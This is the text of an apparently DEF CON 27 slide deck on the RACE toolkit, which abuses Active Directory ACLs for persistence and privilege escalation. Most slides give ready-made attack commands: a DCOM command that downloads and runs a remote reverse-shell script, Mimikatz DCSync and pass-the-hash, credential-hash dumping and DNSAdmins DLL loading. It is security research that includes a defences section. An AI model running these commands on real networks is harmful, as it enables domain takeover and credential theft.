RACE - Minimal Rights and ACE for Active Directory Dominance

Nikhil Mittal
RACE - Minimal Rights and ACE
for Active Directory Dominance
Nikhil Mittal
About me
• Hacker, Red Teamer, Trainer, Speaker at AlteredSecurity and
PentesterAcademy.com
• Twitter - @nikhil_mitt
• Blog – https://labofapenetrationtester.com
• Github - https://github.com/samratashok/
• Creator of Nishang, Deploy-Deception and Kautilya.
• Interested in Offensive Information Security, new attack vectors and
methodologies to pwn systems.
• Previous Talks and/or Trainings
• DefCon, BlackHat, CanSecWest, BruCON and more.
Nikhil Mittal - PentesterAcademy.com DEF CON 27 - RACE for AD Dominance 2
Agenda
• Introduction to ACE/ACLs
• The philosophy of Minimal Permissions
• Introduction to the RACE toolkit
• Persistence
• On-demand privilege escalation
• Domain Controller specific attacks
• Defences
Nikhil Mittal - PentesterAcademy.com DEF CON 27 - RACE for AD Dominance 3
Introduction to ACE
• When a thread requests access
to a resource (securable
object), the system looks for
permissions in a list for to the
users and groups identified in
the thread's access token.
• The list is called Discretionary
Access Control List (DACL).
• This list is made of Access
Control Entries (ACEs).
• Each ACE contains access rights
for a trustee.
Nikhil Mittal - PentesterAcademy.com DEF CON 27 - RACE for AD Dominance 4
The philosophy of Minimal Permissions
• 'FullControl' is awesome but not always required. Same goes for the
'administrative' rights.
• Why not stick with what we need for a specific task?
• Let's say we want to Reset Password of a domain user.
• By default, only Domain Administrators can do it.
• Ask yourself - What minimum permissions do I need to Reset
Password?
Nikhil Mittal - PentesterAcademy.com DEF CON 27 - RACE for AD Dominance 5
The philosophy of Minimal Permissions
• Similarly, what permissions or rights are
actually required for PowerShell Remoting?
• Administrators have FullControl permissions
over the Microsoft.PowerShell session
configuration.
• If we add permissions for a user who has all
the permissions but FullControl - we can
access the machine over PowerShell
Remoting even without Administrator
privileges!
Nikhil Mittal - PentesterAcademy.com DEF CON 27 - RACE for AD Dominance 6
The philosophy of Minimal Permissions
• Throughout the talk, we will focus on using Minimal permissions to
get access to securable objects without having to modify group
memberships or user rights of the user we control.
• We will avoid the FullControl permission wherever possible.
Nikhil Mittal - PentesterAcademy.com DEF CON 27 - RACE for AD Dominance 7
Introducing the RACE toolkit
• Introducing the RACE toolkit! A PowerShell module which has
commands to easily use any of the persistence and privilege
escalation methods we are about to discuss.
https://github.com/samratashok/RACE
• RACE makes use of Microsoft's ActiveDirectory module for some of
the attacks. You can get it from the below link (or from a server with
AD RSAT) :
https://github.com/samratashok/ADModule
Nikhil Mittal - PentesterAcademy.com DEF CON 27 - RACE for AD Dominance 8
Persistence and Privilege Escalation
• When we discuss persistence, local administrator or Domain Admin
(in case of DC) privileges are assumed.
• For on demand Privilege Escalation, we assume administrative access
initially and we try to get those privileges back coupled with
persistence.
• Let's begin with very simple techniques. We will keep moving on to
somewhat complex and lesser known techniques as we move ahead.
Nikhil Mittal - PentesterAcademy.com DEF CON 27 - RACE for AD Dominance 9
Persistence - PowerShell Remoting
• To allow code execution without administrator rights, we can modify
the ACL of PSSession configuration for 'Microsoft.PowerShell'
• Not easy to discover as changes to ACL of PSSession configurations
are rarely monitored.
• Below command from RACE toolkit (when run as a user with admin
privileges on ops-mssql) provides labuser privileges to access it:
Set-RemotePSRemoting -ComputerName ops-mssql -
SamAccountName labuser –Verbose
Nikhil Mittal - PentesterAcademy.com DEF CON 27 - RACE for AD Dominance 10
Demo
Modify PowerShell Remoting permissions on DC
Nikhil Mittal - PentesterAcademy.com DEF CON 27 - RACE for AD Dominance 11
Persistence - WMI
• To allow code execution without administrator rights, we can modify
the ACL of DCOM and WMI namespaces.
• Like PSRemoting, these ACLs are rarely monitored.
• We can also make calls to custom WMI providers which provide
extended command execution and code injection capabilities.
• Below command (when run as a user with admin privileges on ops-
mssql) provides labuser privileges to access ops-mssql:
Set-RemoteWMI -ComputerName ops-mssql -SamAccountName
labuser –Verbose
Nikhil Mittal - PentesterAcademy.com DEF CON 27 - RACE for AD Dominance 12
Persistence - WMI Permanent Event
Consumers (Partially Successful)
• By modifying the ACL of the rootsubscription namespace in WMI, we
can register WMI Permanent Event Consumers.
• While experimenting with this, I found out that the event's payload
was never executed.
• Someone with a better understanding of event consumers in WMI
may like to further investigate ;)
Nikhil Mittal - PentesterAcademy.com DEF CON 27 - RACE for AD Dominance 13
On demand Privilege Escalation - Services
• With admin privileges, we can modify permissions for a service to
allow remote access.
• It is also possible to create new services or change service account for
existing services.
• With sufficient permissions on services, we can abuse Services which
run as SYSTEM to execute commands.
• Note that this will not be silent in the logs!
Nikhil Mittal - PentesterAcademy.com DEF CON 27 - RACE for AD Dominance 14
On demand Privilege Escalation - Services -
Service Control Manager
• Service Control Manager (SCM) provides the ability to create,
configure, start and stop other services on a machine.
• Like any other service, it has ACL which is very useful for an attacker.
• For example, with GenericALL permission over SCM, it is possible to
create a new service which runs as SYSTEM on the target machine.
• We can then set permissions for the new service so that it can be
configured and abused remotely.
Nikhil Mittal - PentesterAcademy.com DEF CON 27 - RACE for AD Dominance 15
On demand Privilege Escalation - Services -
Service Control Manager
• Run the following commands from RACE with administrative privileges for
ops-mssql:
• Provide labuser admin equivalent rights on scmanager on the target machine
Set-RemoteServicePermissions -SamAccountName labuser -ComputerName
ops-mssql -ServiceName scmanager -Verbose
• Create a new service 'evilsvc' which runs as LocalSystem and labuser has permissions
to start it. The service adds proxyuser to the local adminstrators group on start.
Set-RemoteServiceAbuse -ComputerName ops-mssql -UserName
'opsproxyuser' -CreateService evilsvc -SamAccountName labuser -
Verbose
Set-RemoteServicePermissions -SamAccountName labuser -ServiceName
evilsvc -ComputerName ops-mssql
• From the attacker's machine as labuser (adds opsproxyuser to local
administrators group):
sc.exe ops-mssql start evilsvc
Nikhil Mittal - PentesterAcademy.com DEF CON 27 - RACE for AD Dominance 16
On demand Privilege Escalation - Services -
Other Services
• With admin equivalent permissions (CCDCLCSWRPWPDTLOCRSDRCWDWO) on
any service, we can abuse it to escalate privileges.
• Run the following command with administrative privileges on the target machine
to provide labuser permissions over ALG service:
Set-RemoteServicePermissions -SamAccountName labuser -ComputerName
ops-mssql -ServiceName ALG -Verbose
• As lab user, run the following command to configure ALG to run as SYSTEM and
start the service (adds opslabuser to the local administrators group):
Set-RemoteServiceAbuse -ComputerName ops-mssql -UserName
'opslabuser' -ServiceName ALG -Verbose
Nikhil Mittal - PentesterAcademy.com DEF CON 27 - RACE for AD Dominance 17
Demo
Modifying service Permissions
Nikhil Mittal - PentesterAcademy.com DEF CON 27 - RACE for AD Dominance 18
Remote Registry
• Remote Registry provides very interesting opportunities for code
execution and retrieval of secrets from the target's registry.
• There are multiple ways of achieving code persistence and privilege
escalation by modifying permissions of registry keys like Image File
Execution, Run keys and other Autoruns.
Nikhil Mittal - PentesterAcademy.com DEF CON 27 - RACE for AD Dominance 19
On demand Privilege Escalation - Remote
Registry
• With administrative privileges on the target machine, run the
following to modify permissions for remote registry (HKLM:
SYSTEMCurrentControlSetControlSecurePipeServerswinreg) and
registry keys for sethc.exe:
Set-RemoteRegistryPermissions -SamAccountName labuser -
ComputerName ops-mssql -Verbose
Invoke-RegistryAbuse -ComputerName ops-mssql -Method
ImageFileExecution -Verbose
• Note that the above command also disables Network Level
Authentication (NLA) on the target machine.
• This is noisy in the logs.
Nikhil Mittal - PentesterAcademy.com DEF CON 27 - RACE for AD Dominance 20
Persistence - DCOM
• We can modify the ACL for DCOM to achieve code execution without
needing administrator privileges.
Set-DCOMPermissions -UserName labuser -ComputerName
ops-mssql -Verbose
• Then, execute the below command as labuser:
Invoke-DCOMAbuse -ComputerName ops-build -Method MMC20
-Arguments 'iex(iwr -UseBasicParsing
http://192.168.100.31:8080/Invoke-PowerShellTcp.ps1)'
Nikhil Mittal - PentesterAcademy.com DEF CON 27 - RACE for AD Dominance 21
On demand Privilege Escalation -
Just Enough Administration (JEA)
• JEA is a PowerShell v5 feature which provides control over administrative
tasks by providing a PowerShell Remoting Endpoint with:
− Virtual accounts - temporary local accounts which are local admin on member
machines and DA on DCs but no rights to manage resources on network.
− Ability to limit the cmdlets and commands which a user can run through Role
Capabilities.
• It is designed to 'allow non-admins to do some admin tasks'. That is
precisely what we have been doing!
• We will create a new JEA endpoint which provides our user administrator
privileges.
• The endpoint creation does not create any special logs but when we access
the target machine there will be access logs for the virtual account (WinRM
Virtual UsersWinRM_VA_AccountNumber_domain_username)
Nikhil Mittal - PentesterAcademy.com DEF CON 27 - RACE for AD Dominance 22
On demand Privilege Escalation -
Just Enough Administration (JEA)
• If we have administrative privileges on a machine, we can create a JEA
endpoint which provides us access to that machine using PowerShell
Remoting.
Set-JEAPermissions -ComputerName ops-build -
SamAccountName labuser -Verbose
• From the attacker's machine, as labuser, run:
Enter-PSSession -ComputerName ops-build -
ConfigurationName microsoft.powershell64
Nikhil Mittal - PentesterAcademy.com DEF CON 27 - RACE for AD Dominance 23
Demo
Create JEA endpoint on DC
Nikhil Mittal - PentesterAcademy.com DEF CON 27 - RACE for AD Dominance 24
Persistence - Registry
• Since Windows registry stores some credentials, by modifying some
of the registry keys, we can access Machine account hash, local users
hash and cached domain credentials without administrator privileges.
• We need to modify permissions of registry keys which store the
secrets in multiple registry keys under :
− HKLM: SYSTEMCurrentControlSetControlLsa
− HKLM:Security
− HKLM:SAM
• Then, by modifying ACL of Remote Registry, PowerShell Remoting or
WMI we can extract the secrets from the target machine.
Nikhil Mittal - PentesterAcademy.com DEF CON 27 - RACE for AD Dominance 25
Persistence - Registry
• Currently, RACE uses the code from the DAMP toolkit
(https://github.com/HarmJ0y/DAMP/) for this.
• Using DAMP, with administrative privileges on the target:
Add-RemoteRegBackdoor -ComputerName ops-dc -Trustee labuser
-Verbose
• As labuser, retrieve machine account hash:
Get-RemoteMachineAccountHash -ComputerName ops-dc -Verbose
• Retrieve local account hash:
Get-RemoteLocalAccountHash -ComputerName ops-dc -Verbose
• Retrieve domain cached credentials:
Get-RemoteCachedCredential -ComputerName ops-dc -Verbose
Nikhil Mittal - PentesterAcademy.com DEF CON 27 - RACE for AD Dominance 26
Persistence - PowerShell Remoting and WMI
• If there is no access to the Remote Registry Service, we can use
PowerShell remoting or WMI to access the same set of credentials by
modifying respective ACLs.
• For example, after modifying PowerShell ACLs and modifying registry
key permissions on ops-dc:
$opsdc = New-PSSession -ComputerName ops-dc
Invoke-Command -FilePath C:RACE-masterRACE.ps1 -Session $opsdc
Enter-PSSession $opsdc
Get-RemoteMachineAccountHash
Nikhil Mittal - PentesterAcademy.com DEF CON 27 - RACE for AD Dominance 27
Demo
Use PowerShell Remoting to dump DC machine hash
Nikhil Mittal - PentesterAcademy.com DEF CON 27 - RACE for AD Dominance 28
Persistence - Registry
• Once we have access to a machine using any of the discussed
methods, there are so many opportunities.
• What can we do with access to machine using PSRemoting or WMI or
Remote Registry without admin privileges? Lot of things!
• For example, if AutoLogon credentials are in use, we can read them
from Registry without a need to modify any permission other than
access to the target machine.
Get-Item 'HKLM:SOFTWAREMicrosoftWindows
NTCurrentVersionWinlogon'
Nikhil Mittal - PentesterAcademy.com DEF CON 27 - RACE for AD Dominance 29
On demand Privilege Escalation DC -
DNSAdmins
• DNSAdmins is an AD security group.
• By default, the members of this group have Read, Write, Create All
Child objects, Delete Child objects, Special Permissions on the DNS
Server object.
• With membership of this group (and DNS service restart rights), it is
possible to load arbitrary DLL from a UNC path in the DNS service.
• If a Domain Controller is running the DNS service, this means SYSTEM
privileges on the DC.
Nikhil Mittal - PentesterAcademy.com DEF CON 27 - RACE for AD Dominance 30
On demand Privilege Escalation DC -
DNSAdmins
• Once we have DA privileges, we can modify the DACL of the DNS
Server object and restart permissions on the DNS service.
• This allows us to load an arbitrary DLL with privileges of the DNS
Service!
• Also, DNSAdmins is not one of the Protected Groups (ACL not
protected by AdminSDHolder). So we can even modify it's own ACL to
add/remove members at will.
Nikhil Mittal - PentesterAcademy.com DEF CON 27 - RACE for AD Dominance 31
On demand Privilege Escalation DC -
DNSAdmins
• Use the below command to change the ACL of the DNS Server object
in AD to add GenericRead and GenericWrite for the attacker
controlled user (needs ActiveDirectory module). The command also
adds restart permissions for DNS service :
Set-DNSAbusePermissions -SAMAccountName labuser -
DistinguishedName
'CN=MicrosoftDNS,CN=System,DC=offensiveps,DC=powershell
,DC=local' -ComputerName ops-dc -Verbose
• On the attacker's machine (needs DNSServer module from DNS RSAT):
Invoke-DNSAbuse -ComputerName ops-dc -DLLPath ops-
builddllmimilib.dll -Verbose
Nikhil Mittal - PentesterAcademy.com DEF CON 27 - RACE for AD Dominance 32
On demand Privilege Escalation DC -
DSRM Admin
• DSRM (Directory Services Restore Mode) administrator is a special
'local administrator' account on a DC.
• It is possible to modify the behaviour of the DSRM administrator by
creating/modifying the DsrmAdminLogonBehavior to 2 in the registry
key HKLM:SystemCurrentControlSetControlLsa
• With the above registry value and NTLM hash of the DSRM
administrator, we can use Pass-The-Hash to access the DC.
• We can extract the hash using mimikatz or from SAM hive. We can
also modifying registry permissions as discussed previously.
Nikhil Mittal - PentesterAcademy.com DEF CON 27 - RACE for AD Dominance 33
On demand Privilege Escalation DC -
DSRM Admin
• Use the below command on DC as DA to set the logon behaviour of
the DSRM administrator:
Set-DCPermissions -Method DSRMAdmin -SAMAccountName
labuser -Verbose
• On attacker's machine:
Invoke-Mimikatz -Command '"sekurlsa::pth /domain:ops-dc
/user:Administrator /ntlm:<NTLMHash>
/run:powershell.exe"'
Enter-PSSession ops-dc -Authentication Negotiate
Nikhil Mittal - PentesterAcademy.com DEF CON 27 - RACE for AD Dominance 34
Persistence DC -
Resource-based Constrained Delegation
• Resource-based Constrained Delegation enables the resource owner
to set delegation to it. That is, it is the resource owner/administrator
who decides which account can delegate to it unlike the traditional
constrained delegation.
• Due to this functionality, a simple Write permission on a computer
object can be used to access the computer as ANY user (including
DAs).
Nikhil Mittal - PentesterAcademy.com DEF CON 27 - RACE for AD Dominance 35
Persistence DC -
Resource-based Constrained Delegation
• Run the below command on DC as DA to set write permissions on ops-file
for labuser:
Set-DCPermissions -Method RBCD -DistinguishedName 'CN=OPS-
FILE,OU=Servers,DC=offensiveps,DC=powershell,DC=local' -
SAMAccountName labuser -Verbose
• Run the below command on the attacker's machine to allow delegation for
'attacker' machine account :
Set-ADComputer -Identity ops-file -
PrincipalsAllowedToDelegateToAccount ops-user31$
• Use Rubeus (https://github.com/GhostPack/Rubeus/) to get a TGS to
access CIFS on ops-file as Administrator:
.Rubeus.exe s4u /user:ops-user31$ /aes256:
/msdsspn:cifs/ops-file /impersonateuser:administrator /ptt
Nikhil Mittal - PentesterAcademy.com DEF CON 27 - RACE for AD Dominance 36
Persistence DC - Exchange Groups
• MS Exchange installations changes the schema of the domain and
also adds new groups.
• Groups like Exchange Servers, Exchange Trusted Subsystem and
Exchange Windows Permissions have interesting permissions. The
groups are added in a new container 'Microsoft Exchange Security
Groups'
• The above are not Protected Groups so we can modify their ACLs.
• Let's target the Exchange Windows Permissions group which has
WriteDACL permission on the domain object (or even forest root
domain object depending on the installation).
Nikhil Mittal - PentesterAcademy.com DEF CON 27 - RACE for AD Dominance 37
Persistence DC - Exchange Groups
• Use the below command on DC as DA to provide labuser WriteDACL permissions
on Exchange Windows Permissions group which, in turn, has WriteDACL
permission on the domain object (or even forest root domain object depending
on the installation).
Set-DCPermissions -Method GroupDACL -DistinguishedName 'CN=Exchange
Windows Permissions,OU=Microsoft Exchange Security
Groups,DC=powershell,DC=local' -SAMAccountName opslabuser -Verbose
• Use the below command as labuser to modify ACL on Exchange Windows
Permissions and add WriteMember rights to labuser:
Set-ADACL -SamAccountName opslabuser -DistinguishedName 'CN=Exchange
Windows Permissions,OU=Microsoft Exchange Security
Groups,DC=powershell,DC=local' -GUIDRight WriteMember -Server
powershell.local -Verbose
Nikhil Mittal - PentesterAcademy.com DEF CON 27 - RACE for AD Dominance 38
Persistence DC - Exchange Groups
• With membership of the Exchange Windows Permissions group,
labuser has WriteDACL permissions on the domain object. Let's add
DCSync permissions.
Set-ADACL -SamAccountName opslabuser -
DistinguishedName 'DC=powershell,DC=local' -GUIDRight
DCSync -Server powershell.local -Verbose
• Now we can run DCSync with Mimikatz on the attacker's machine:
Invoke-Mimikatz -Command '"lsadump::dcsync
/user:pskrbtgt /domain:powershell.local"'
Nikhil Mittal - PentesterAcademy.com DEF CON 27 - RACE for AD Dominance 39
Demo
Modify Exchange Group Permissions to compromise forest root
Nikhil Mittal - PentesterAcademy.com DEF CON 27 - RACE for AD Dominance 40
Persistence DC - User object ACL
• Another interesting (and well known) persistence technique is to modify
permissions on a normal user.
• This helps us in using that user as a proxy for the persistence mechanisms we
have already discussed.
• For example, the permission to Reset Password (User-Force-Change-Password)
for a user allows us to, well, reset its password without knowing the current
password.
Set-ADACL -SamAccountname labuser -TargetSamAccountName support1user
-GUIDRight ResetPassword -Verbose
• As labuser, run the following command from ActiveDirectory module to reset the
password of support1 user at will:
Set-ADAccountPassword -Identity support1user -Reset -NewPassword
(ConvertTo-SecureString -AsPlainText "Password@123" -Force) -Verbose
Nikhil Mittal - PentesterAcademy.com DEF CON 27 - RACE for AD Dominance 41
Persistence DC - AdminSDHolder
• A well known persistence method is to abuse ACL of AdminSDHolder.
• We can modify the ACL of AdminSDHolder to get rights like
FullControl, WriteMembers, ResetPassword and more on all
Protected Groups.
• The best way is to get WriteDACL permissions on AdminSDHolder so
that we can modify permissions on demand.
Set-DCPermissions -Method AdminSDHolder -SAMAccountName labuser -
DistinguishedName
'CN=AdminSDHolder,CN=System,DC=offensiveps,DC=powershell,DC=local'
-Verbose
Nikhil Mittal - PentesterAcademy.com DEF CON 27 - RACE for AD Dominance 42
Persistence DC - DCSync
• Perhaps the most famous ACL abuse!
• We can modify the ACL of the domain object to get 'DCSync' rights.
Run as DA on DC:
Set-DCPermissions -Method DCSync -SAMAccountName
labuser -DistinguishedName
'DC=offensiveps,DC=powershell,DC=local' -Verbose
• Now we can run DCSync with Mimikatz as labuser:
Invoke-Mimikatz -Command '"lsadump::dcsync
/user:opskrbtgt"'
Nikhil Mittal - PentesterAcademy.com DEF CON 27 - RACE for AD Dominance 43
Persistence DC - DCShadow
• DCShadow allows modification of objects without leaving change logs
for the target object.
• It registers the attacker's machine temporarily as a domain controller
and allows modification of attributes.
• The attacker's machine must be part of the forest root to execute this
attack.
• We can modify permissions of multiple objects in a domain to
execute DCShadow without DA privileges.
Nikhil Mittal - PentesterAcademy.com DEF CON 27 - RACE for AD Dominance 44
Persistence DC - DCShadow
• DCShadow can be used with minimal permissions by modifying ACLs
of -
−The domain object.
− DS-Install-Replica (Add/Remove Replica in Domain)
− DS-Replication-Manage-Topology (Manage Replication Topology)
− DS-Replication-Synchronize (Replication Synchornization)
−The Sites object (and its children) in the Configuration container.
− CreateChild and DeleteChild
−The object of the computer which is registered as a DC.
− WriteProperty (Not GenericWrite)
−The target object.
− WriteProperty (Not GenericWrite)
Nikhil Mittal - PentesterAcademy.com DEF CON 27 - RACE for AD Dominance 45
Persistence DC - DCShadow
• For example, to allow labuser to modify any attribute of serviceuser
from the attacker machine ops-user1:
Set-DCShadowPermissions -FakeDC ops-user1 -
SAMAccountName serviceuser -Username labuser -Verbose
Nikhil Mittal - PentesterAcademy.com DEF CON 27 - RACE for AD Dominance 46
Summary of attacks
ACL modified for Targets DC or
Member Machine or
Both
Can be executed with Resulting privileges
PowerShell
Remoting
Both PowerShell Remoting Normal User permission
(Very useful for chaining with
other techniques)
WMI Both WMI Normal User permission
(Very useful for chaining with
other techniques)
Services Both (Too noisy on
DC)
RPC, PSRemoting, WMI SYSTEM
Registry Autoruns Both (Noisy on DC) Remote Registry, PSRemoting, WMI SYSTEM
DCOM Both RPC, PSRemoting, WMI Normal User Permission
JEA Both PSRemoting Local Administrator
DA on DC (locally)
Creds in Registry Both Remote Registry, PSRemoting, WMI Local Administrator
DA on DCNikhil Mittal - PentesterAcademy.com DEF CON 27 - RACE for AD Dominance 47
Summary of attacks
ACL modified for Targets DC or Member
Machine or Both
Can be executed with Resulting privileges
DNS Server Object DNS Server DNS RSAT SYSTEM
DSRM Admin Logon
Behaviour
DC PSRemoting, WMI or
other services
DA
Resource-based
Constrained Delegation
Member Machine PSRemoting, WMI or
other services
Local Administrator
Exchange Groups DC
or Forest root DC
PSRemoting, WMI or
other services
DA
Or DA on forest root
User object User -- That of the target user
AdminSDHolder DC Remote Registry,
PSRemoting, WMI
DA
DCSync DC Mimikatz (DRS) DA
DCShadow Forest root DC Mimikatz (DRS) EA
Nikhil Mittal - PentesterAcademy.com DEF CON 27 - RACE for AD Dominance 48
Previous Work
• ACL abuse is not something new, system administrators have been
using this for so many years!
• We can still see articles from 2001 talking about setting Launch
Permissions for DCOM[1], for WMI from 2002[2] and so on.
• (French) Chemins de contrôle en environnement Active Directory
https://www.sstic.org/2014/presentation/chemins_de_controle_active_directory/
• An ACE Up the Sleeve Designing Active Directory DACL Backdoors
(DEF CON 25) -
https://media.defcon.org/DEF%20CON%2025/DEF%20CON%2025%20presentations/DEF%20CON
%2025%20-%20Andrew-Robbins-and-Will-Schroeder-An-Ace-Up-The-Sleeve.pdf
Nikhil Mittal - PentesterAcademy.com DEF CON 27 - RACE for AD Dominance 49
Defenses
• Events logs are the best bet against the discussed attacks! Other than,
of course, protecting your Domain Administraors.
• Every technique where we access machine there will be a 4624, 4634
and 4672 in case of admin logon.
• Auditing changes to ACLs is also useful:
https://blogs.technet.microsoft.com/canitpro/2017/03/29/step-by-step-enabling-advanced-
security-audit-policy-via-ds-access/
• Auditing dangerous ACLs using BloodHound, ADACLScanner and
PingCastle is recommended.
• Also, see my project Deploy-Deception for tricking an attacker in
assuming they found object(s) with misconfigured ACLs :)
Nikhil Mittal - PentesterAcademy.com DEF CON 27 - RACE for AD Dominance 50
Future Work
• Service Permissions are stored in Registry. So, that is a place ripe for
abuse.
• As noted earlier, WMI Permanent Event Consumer needs to be
explored more.
• For the RACE toolkit, work on hiding the ACE we introduce is highly
desirable. Also, implementation of more Registry Autoruns!
Nikhil Mittal - PentesterAcademy.com DEF CON 27 - RACE for AD Dominance 51
Thank You - Questions?
• Contact me:
@nikhil_mitt
nikhil.uitrgpv@gmail.com
nikhil@pentesteracademy.com
• Slides, code and blog posts will be available on:
https://labofapenetrationtester.com/
https://github.com/samratashok/RACE
Nikhil Mittal - PentesterAcademy.com DEF CON 27 - RACE for AD Dominance 52
1 of 52

Recommended

Forging Trusts for Deception in Active Directory by
Forging Trusts for Deception in Active DirectoryForging Trusts for Deception in Active Directory
Forging Trusts for Deception in Active DirectoryNikhil Mittal
56.8K views36 slides
PowerShell for Practical Purple Teaming by
PowerShell for Practical Purple TeamingPowerShell for Practical Purple Teaming
PowerShell for Practical Purple TeamingNikhil Mittal
5.3K views46 slides
AMSI: How Windows 10 Plans to Stop Script-Based Attacks and How Well It Does It by
AMSI: How Windows 10 Plans to Stop Script-Based Attacks and How Well It Does ItAMSI: How Windows 10 Plans to Stop Script-Based Attacks and How Well It Does It
AMSI: How Windows 10 Plans to Stop Script-Based Attacks and How Well It Does ItNikhil Mittal
45K views26 slides
Windows Privilege Escalation by
Windows Privilege EscalationWindows Privilege Escalation
Windows Privilege EscalationRiyaz Walikar
15.2K views47 slides
0wn-premises: Bypassing Microsoft Defender for Identity by
0wn-premises: Bypassing Microsoft Defender for Identity0wn-premises: Bypassing Microsoft Defender for Identity
0wn-premises: Bypassing Microsoft Defender for IdentityNikhil Mittal
1.6K views26 slides
Red Team Revenge - Attacking Microsoft ATA by
Red Team Revenge - Attacking Microsoft ATARed Team Revenge - Attacking Microsoft ATA
Red Team Revenge - Attacking Microsoft ATANikhil Mittal
2.5K views41 slides

More Related Content

What's hot

An ACE in the Hole - Stealthy Host Persistence via Security Descriptors by
An ACE in the Hole - Stealthy Host Persistence via Security DescriptorsAn ACE in the Hole - Stealthy Host Persistence via Security Descriptors
An ACE in the Hole - Stealthy Host Persistence via Security DescriptorsWill Schroeder
6.9K views63 slides
DerbyCon 2019 - Kerberoasting Revisited by
DerbyCon 2019 - Kerberoasting RevisitedDerbyCon 2019 - Kerberoasting Revisited
DerbyCon 2019 - Kerberoasting RevisitedWill Schroeder
10.4K views27 slides
SANS Purple Team Summit 2021: Active Directory Purple Team Playbooks by
SANS Purple Team Summit 2021: Active Directory Purple Team PlaybooksSANS Purple Team Summit 2021: Active Directory Purple Team Playbooks
SANS Purple Team Summit 2021: Active Directory Purple Team PlaybooksMauricio Velazco
856 views24 slides
Hunting for Credentials Dumping in Windows Environment by
Hunting for Credentials Dumping in Windows EnvironmentHunting for Credentials Dumping in Windows Environment
Hunting for Credentials Dumping in Windows EnvironmentTeymur Kheirkhabarov
15.3K views61 slides
Hacked? Pray that the Attacker used PowerShell by
Hacked? Pray that the Attacker used PowerShellHacked? Pray that the Attacker used PowerShell
Hacked? Pray that the Attacker used PowerShellNikhil Mittal
8.8K views43 slides
Hunting for Privilege Escalation in Windows Environment by
Hunting for Privilege Escalation in Windows EnvironmentHunting for Privilege Escalation in Windows Environment
Hunting for Privilege Escalation in Windows EnvironmentTeymur Kheirkhabarov
12K views99 slides

What's hot(20)

An ACE in the Hole - Stealthy Host Persistence via Security Descriptors by Will Schroeder
An ACE in the Hole - Stealthy Host Persistence via Security DescriptorsAn ACE in the Hole - Stealthy Host Persistence via Security Descriptors
An ACE in the Hole - Stealthy Host Persistence via Security Descriptors
Will Schroeder6.9K views
DerbyCon 2019 - Kerberoasting Revisited by Will Schroeder
DerbyCon 2019 - Kerberoasting RevisitedDerbyCon 2019 - Kerberoasting Revisited
DerbyCon 2019 - Kerberoasting Revisited
Will Schroeder10.4K views
SANS Purple Team Summit 2021: Active Directory Purple Team Playbooks by Mauricio Velazco
SANS Purple Team Summit 2021: Active Directory Purple Team PlaybooksSANS Purple Team Summit 2021: Active Directory Purple Team Playbooks
SANS Purple Team Summit 2021: Active Directory Purple Team Playbooks
Mauricio Velazco856 views
Hunting for Credentials Dumping in Windows Environment by Teymur Kheirkhabarov
Hunting for Credentials Dumping in Windows EnvironmentHunting for Credentials Dumping in Windows Environment
Hunting for Credentials Dumping in Windows Environment
Teymur Kheirkhabarov15.3K views
Hacked? Pray that the Attacker used PowerShell by Nikhil Mittal
Hacked? Pray that the Attacker used PowerShellHacked? Pray that the Attacker used PowerShell
Hacked? Pray that the Attacker used PowerShell
Nikhil Mittal8.8K views
Hunting for Privilege Escalation in Windows Environment by Teymur Kheirkhabarov
Hunting for Privilege Escalation in Windows EnvironmentHunting for Privilege Escalation in Windows Environment
Hunting for Privilege Escalation in Windows Environment
Lateral Movement with PowerShell by kieranjacobsen
Lateral Movement with PowerShellLateral Movement with PowerShell
Lateral Movement with PowerShell
kieranjacobsen7K views
Derbycon - The Unintended Risks of Trusting Active Directory by Will Schroeder
Derbycon - The Unintended Risks of Trusting Active DirectoryDerbycon - The Unintended Risks of Trusting Active Directory
Derbycon - The Unintended Risks of Trusting Active Directory
Will Schroeder35.9K views
Catch Me If You Can: PowerShell Red vs Blue by Will Schroeder
Catch Me If You Can: PowerShell Red vs BlueCatch Me If You Can: PowerShell Red vs Blue
Catch Me If You Can: PowerShell Red vs Blue
Will Schroeder7.8K views
Carlos García - Pentesting Active Directory Forests [rooted2019] by RootedCON
Carlos García - Pentesting Active Directory Forests [rooted2019]Carlos García - Pentesting Active Directory Forests [rooted2019]
Carlos García - Pentesting Active Directory Forests [rooted2019]
RootedCON4.5K views
Invoke-Obfuscation DerbyCon 2016 by Daniel Bohannon
Invoke-Obfuscation DerbyCon 2016Invoke-Obfuscation DerbyCon 2016
Invoke-Obfuscation DerbyCon 2016
Daniel Bohannon7.1K views
aclpwn - Active Directory ACL exploitation with BloodHound by DirkjanMollema
aclpwn - Active Directory ACL exploitation with BloodHoundaclpwn - Active Directory ACL exploitation with BloodHound
aclpwn - Active Directory ACL exploitation with BloodHound
DirkjanMollema11.5K views
The Unintended Risks of Trusting Active Directory by Will Schroeder
The Unintended Risks of Trusting Active DirectoryThe Unintended Risks of Trusting Active Directory
The Unintended Risks of Trusting Active Directory
Will Schroeder8.5K views
Windows attacks - AT is the new black by Chris Gates
Windows attacks - AT is the new blackWindows attacks - AT is the new black
Windows attacks - AT is the new black
Chris Gates10.9K views
Hunting Lateral Movement in Windows Infrastructure by Sergey Soldatov
Hunting Lateral Movement in Windows InfrastructureHunting Lateral Movement in Windows Infrastructure
Hunting Lateral Movement in Windows Infrastructure
Sergey Soldatov9K views
PowerShell for Penetration Testers by Nikhil Mittal
PowerShell for Penetration TestersPowerShell for Penetration Testers
PowerShell for Penetration Testers
Nikhil Mittal36.2K views
Abusing Microsoft Kerberos - Sorry you guys don't get it by Benjamin Delpy
Abusing Microsoft Kerberos - Sorry you guys don't get itAbusing Microsoft Kerberos - Sorry you guys don't get it
Abusing Microsoft Kerberos - Sorry you guys don't get it
Benjamin Delpy43.1K views
Client side attacks using PowerShell by Nikhil Mittal
Client side attacks using PowerShellClient side attacks using PowerShell
Client side attacks using PowerShell
Nikhil Mittal7.7K views

Similar to RACE - Minimal Rights and ACE for Active Directory Dominance

BSides SG Practical Red Teaming Workshop by
BSides SG Practical Red Teaming WorkshopBSides SG Practical Red Teaming Workshop
BSides SG Practical Red Teaming WorkshopAjay Choudhary
673 views26 slides
Exploiting Active Directory Administrator Insecurities by
Exploiting Active Directory Administrator InsecuritiesExploiting Active Directory Administrator Insecurities
Exploiting Active Directory Administrator InsecuritiesPriyanka Aash
246 views27 slides
2019 Blackhat Booth Presentation - PowerUpSQL by
2019 Blackhat Booth Presentation - PowerUpSQL2019 Blackhat Booth Presentation - PowerUpSQL
2019 Blackhat Booth Presentation - PowerUpSQLScott Sutherland
831 views49 slides
Open shift deployment review getting ready for day 2 operations by
Open shift deployment review   getting ready for day 2 operationsOpen shift deployment review   getting ready for day 2 operations
